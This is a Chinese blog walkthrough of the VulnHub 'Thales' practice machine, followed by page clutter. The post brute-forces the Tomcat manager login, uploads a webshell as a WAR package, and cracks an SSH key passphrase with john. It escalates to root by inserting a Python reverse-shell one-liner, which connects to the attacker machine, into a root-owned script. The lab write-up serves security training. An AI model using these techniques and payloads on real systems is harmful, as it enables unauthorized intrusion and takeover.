VulnHub靶场Thales

已于 2023-12-18 17:52:22 修改
阅读量949 收藏 28
点赞数 21
分类专栏: 打靶日记 文章标签: 网络 linux 运维
于 2023-12-18 17:51:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73985767/article/details/135042427
版权

靶场地址https://www.vulnhub.com/entry/thales-1,749/

配置:

kali虚拟机有两个网卡,一个是仅主机模式,一个是NAT模式,应为校园网原因不能使用桥接模式

靶机一个网卡仅主机模式

靶机发现

攻击机:192.168.56.104

靶机:192.168.56.108

信息收集

22/tcp ssh

8080/tcp http

Apache Tomcat 9.0.52

漏洞发现

从Tomcat 9.0.52入手

传递参数name:admin password:12356

简单的base64加密,放到爆破模块看看存不存在弱口令

base64编码

去掉这个勾,免得对我们的payload编码

开始爆破

要等好久,我就换了msf

跑了一遍没有出来,发现没有tomcat用户名,然后我就自己创建了个字典加进去,就出来了。

密码是role1

登陆进后台了

漏洞利用

可以部署war包

尝试了weevely工具生成木马上传,发现是404。

后来我用哥斯拉生成了一个木马,上传连接的时候,发现我傻B了,木马路径是war包名/文件名

OK连接成功

也可以利用msfvenom,后面直接反弹shell,更加稳定。

切换反弹shell

注意python版本

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

Ctrl+Z

stty -a

stty raw -echo;fg

reset

stty rows26 columns 126

提权

user.txt没有权限查看,应该是一个flag,有个ssh文件,下载id_rsa

通过ssh2john转换为可以识别的信息,破解密码

python3 /usr/share/john/ssh2john.py id_rsa >crack.txt

john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt

有个脚本文件,属主是root,可以用来提权

这个脚本代码是看大佬写的

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Jessica*
关注
  • 21
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thales
03-26
Thales,这个名字源于古希腊哲学家泰勒斯(Thales of Miletus),在现代则被用作一家全球领先的科技公司——泰雷兹(Thales Group)的名称。Thales集团是一家法国跨国企业,专注于为航空、国防、安全和太空等行业...
THALES
10-24
"THALES"是一个可能与字体相关的主题,但提供的信息相当有限。在IT行业中,字体通常涉及到文本显示、排版设计、编程以及用户界面等多个领域。THALES这个名字本身并不直接指向一个特定的字体或技术,因此我们需要进行...
Thales Corporate_Brochure
11-24
international innovation partnerships responsibility aerospace space defence security
Thales(泰勒兹)基于模型的系统工程方法论
08-15
法国泰勒兹集团(Thales)基于模型的系统工程方法论资料
HSM-Basics.pdf.tar.gz_HSM_HSM thales
07-14
Thales HSM Basics. How to interface with HSM device
2023-2024华为ICT大赛中国区 实践赛网络赛道 全国总决赛 理论部分真题
gaogao0305的博客
07-02 532
本文为2023-2024华为ICT大赛 中国区 全国总决赛 实践赛 网络赛道 理论部分考试真题,涵盖数通模块10题、安全模块7题、WLAN模块3题
windows网络进阶之listen参数含义
m0_62681656的博客
07-02 783
在Windows网络编程中,在使用TCP时,listen函数它是一个重要的关键的步骤,使得套接字能够接收传入的连接请求,下面我主要通过实战案例讲解listen参数的含义。注:本章是一个进阶篇,前提是能够掌握基础windows网络编程概念。二、listen参数1.SOCKET s这是一个已绑定(通过bind函数)的套接字,作用用于接收客户端的连接请求。这个参数比较好理解,我们重点讲解第二个参数。挂起的连接队列的最大长度。
软考数据库——第五章网络基础知识(知识点介绍和历年真题)
分享关于数据的知识。
07-06 35
第五章网络基础知识
常见网络攻击方式及防御方法
2301_76786857的博客
07-04 883
网络攻击对个人、组织和整个社会都带来了严重的威胁,因此必须采取有效的安全措施来保护网络系统和用户的信息安全。
AVIO自定义读写
qq_54017644的博客
07-05 163
AVIO编程实战---极精简代码
【哈尔滨二级等保测评需要测哪些指标】
weixin_62641226的博客
07-02 351
这一系列的指标包括:物理安全,网络安全,主机安全,应用安全,数据安全,安全管理体系等,以保证信息系统的完整性、有效性和合规性。物理安全是信息系统的根本,它包含了物理位置的选择,物理访问控制,抗入侵和防窃取等方面的需求。身份鉴别与访问控制:本系统必须能识别使用者的身份,并严格地控制使用者的存取权限,以保证系统的安全与可靠。机房环境:计算机室的选址要有防震,防风,防雨,并保证温湿度控制,防火,防水,防雷等方面的要求。安全审计与漏洞管理:对系统进行定期的安全审核与漏洞检测,以确保系统的安全性能够得到及时的解决。
ED01-CMS v20180505 文件上传漏洞(CVE-2022-28525)
Flag少侠的博客
07-02 4573
CVE-2022-28525 是一个影响 ED01-CMS v20180505 版本的任意文件上传漏洞。该漏洞位于,攻击者可以利用该漏洞在未经授权的情况下上传任意文件到服务器上,从而可能导致远程代码执行(RCE)​ ()​​ ()​。漏洞的主要问题是上传功能对上传文件的类型检查不足,允许上传包含恶意代码的文件。在实际利用过程中,攻击者可以上传一个包含 PHP 代码的文件,例如shell.php,然后通过访问该文件来执行任意代码​ ()​​ ()​。
系统安全及应用
WuuuuuJay的博客
07-02 917
John the Ripper是一款开源的密码破解工具,能够在已知密文的情况下快速分析出明文的密码字串,支持DES、MD5等多种加密算法,而且允许使用密码字典(包含各种密码组合的列表文件)来进行暴力破解。当使用相同授权的用户较多,或者授权的命令较多时,可以采用集中定义的别名。PAM(Pluggable Authentication Modules) ,是 Linux 系统可插拔认证模块,是一种高效而且灵活便利的用户级别的认证方式,它也是当前 Linux 服务器普遍使用的认证方式。
探索Mojolicious的网络探险家:Mojo::UserAgent 类
2402_85758936的博客
07-02 726
Mojolicious是一个基于Perl的现代、灵活的Web开发框架,它提供了一套丰富的工具来简化Web开发流程。在这个框架中,类扮演着网络请求客户端的角色,使得异步HTTP请求变得简单而强大。本文将详细介绍类的用途、特性以及如何使用它来发起网络请求。
TCP三次握手
weixin_42936764的博客
07-01 368
二次握手:服务端发送带有 SYN+ACK 标志的连接请求和应答数据包给客户端。一次握手:客户端发送带有 SYN 标志的连接请求数据包给服务端。三次握手:客户端发送带有 ACK 标志的应答数据包给服务端。
计算机网络概述--自我学习用
longer_net的博客
07-02 1267
计算机网络相关知识,以及一些问题
Nginx的优化和防盗链
2402_84868182的博客
07-03 558
控制time_wait状态的持续时间,持续30秒,不是立即把time_wait的连接收回。而是尽可能的把time_wait状态进行回收,没用的,空闲的,进行回收。客户端发送一个完整的请求头的超时时间,80秒之内没有发送一个完整的请求头,nginx返回码408(requst time out) 请求超时。允许复用time_wait状态的连接,新的连接可以直接使用time_wait状态的端口,可以提高连接的重用率。压缩比列 1-9 ,数字越小,压缩的比率越小,速度越快,数字越大,压缩的比率就越高,速度越慢。
独享代理VS共享代理,新手选择攻略
Ssm2022的博客
07-03 1231
随着互联网的广泛普及和应用,涉及网络隐私、数据安全和网络访问控制的问题变得越来越重要。代理服务器作为一种常见的网络工具,可以在跨境电商、海外社媒、SEO投放、网页抓取等领域发挥作用,实现匿名访问并加强网络安全。在代理服务器类别中,独享代理比共享代理更实用。
RedHat运维-Linux文本操作基础-SED基础
最新发布
a15735748145a的博客
07-06 113
34. 假设当前工作目录为/home/opensuse/Desktop/,有两份文件a.txt与aa.txt,现如果想将a.txt中所有字符串“Shenzhen”都替换为“Nanshan”,并且将替换完成的行打印出来,再覆盖写到aa.txt文件中,则命令为________________________________________________;
Kitalpha-CTK-TR-Cadence.pdf
12-21
"这份文档是关于MBSE(Model-Based Systems Engineering,基于模型的系统工程)工具Capella的相关资料,由Thales集团发布。文档主要介绍了Cadence,它可能是一个与Capella相关的软件或插件。内容包括对Cadence的介绍...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值